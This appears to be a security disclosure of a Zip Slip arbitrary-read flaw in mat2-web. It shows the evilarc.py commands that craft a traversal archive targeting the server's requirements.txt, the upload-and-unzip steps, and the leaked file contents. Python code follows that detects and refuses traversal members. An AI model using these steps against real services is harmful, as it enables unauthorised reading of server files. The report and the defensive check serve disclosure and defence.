Arbitrary read via malicious zip file
[As received by email, sent by jfriedli]
I found an issue in mat2. It is vulnerable to the Zip slip vulnerability.
Here's a little summary :)
Create malicious file
Script used to create a Zip Slip file: https://github.com/ptoomey3/evilarc/blob/master/evilarc.py
python2.7 evilarc.py filename_to_extract.txt -d 0 -o "unix" -p "../../../home/kali/Documents/projects"
filename_to_extract.txt is the filename of the file you want to extract from the victim system.
Note: it has to be an extension supported by mat2,
and upon extracting the cleaned zip file you receive the file from the victim.
Example Extracting Requirements.txt From Webserver
Create empty target file we want to extract.
We know the absolute path of the target file on the server from the Dockerfile.
python2.7 path_tra.py requirements.txt -d 0 -o "unix" -p "../../../var/www/mat2-web/"
Creating evil.zip containing ../../../var/www/mat2-web/requirements.txt
Check if the path and filename are correct.
cat evilzip
PK�m�T*../../../var/www/mat2-web/requirements.txtPK�m�T*�t2-web/requirements.txtPKXH
Then upload the file via the web interface and download the cleaned zip.
Afterward we unzip it.
unzip evil.cleaned.zip
Archive: evil.cleaned.zip
warning: skipped "../" path component(s) in ../../../var/www/mat2-web/requirements.txt
extracting: var/www/mat2-web/requirements.txt
And we can prove that we received the content of the
requirements.txt from the server.
cat var/www/mat2-web/requirements.txt
mutagen==1.45.1
ffmpeg==1.4
bubblewrap==1.2.0
mat2==0.12.4
flask==2.1.2
Flask-RESTful==0.3.9
Flask-Cors==3.0.10
Cerberus==1.3.4
Flask-Testing==0.8.1
blinker==1.4
flasgger==0.9.5
Flask-Assets==2.0
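The defensive check that stops the class of bug described in this report is to validate every archive member name against the extraction root before touching the filesystem. The following is an added example written for this page; it is not mat2's code, not the reporter's script, and not the fix mat2 shipped. It resolves each member name against a root directory (the path "/tmp/extract" is an assumed placeholder) and flags any name that lands outside it, then runs that check over a constructed in-memory archive containing one benign entry and one traversal entry of the shape shown above.

```python
import io
import os
import zipfile


def member_escapes(root, name):
    """Return True if a zip member name would resolve outside `root`.

    Both the root and the candidate target are resolved with realpath so that
    '..' segments, duplicated separators and a symlinked root are all taken
    into account before the containment test. Absolute member names are
    caught because os.path.join discards `root` when `name` is absolute.
    """
    root = os.path.realpath(root)
    # The zip spec mandates '/', but some writers emit backslashes.
    candidate = name.replace("\\", "/")
    target = os.path.realpath(os.path.join(root, candidate))
    return os.path.commonpath([root, target]) != root


def unsafe_members(zip_bytes, root="/tmp/extract"):
    """List the member names in an archive (given as bytes) that escape `root`.

    The root is an assumed placeholder; it does not need to exist, since
    realpath resolves non-existent paths lexically.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if member_escapes(root, name)]


def safe_extract(zip_bytes, root):
    """Extract an archive only if every member stays inside `root`.

    Refusing the whole archive (rather than skipping bad entries) keeps the
    failure loud, which is what you want in a service that re-packs whatever
    it extracted.
    """
    bad = unsafe_members(zip_bytes, root)
    if bad:
        raise ValueError("archive contains path-traversal members: %r" % bad)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(root)
    return sorted(os.listdir(root))


def build_sample_archive():
    """Constructed test fixture: one benign member and one traversal member.

    The traversal name mirrors the one shown in the report. zipfile does not
    normalise names on write, so the entry is stored exactly as given.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "benign content\n")
        zf.writestr("../../../var/www/mat2-web/requirements.txt", "")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_archive()
    print("unsafe members:", unsafe_members(sample))
    try:
        safe_extract(sample, "/tmp/extract")
    except ValueError as exc:
        print("refused:", exc)
```

Run as a script it prints the traversal member and the refusal; the same `unsafe_members` check can be placed in front of any extraction step, and logging its output gives a cheap detection signal for uploads of this kind.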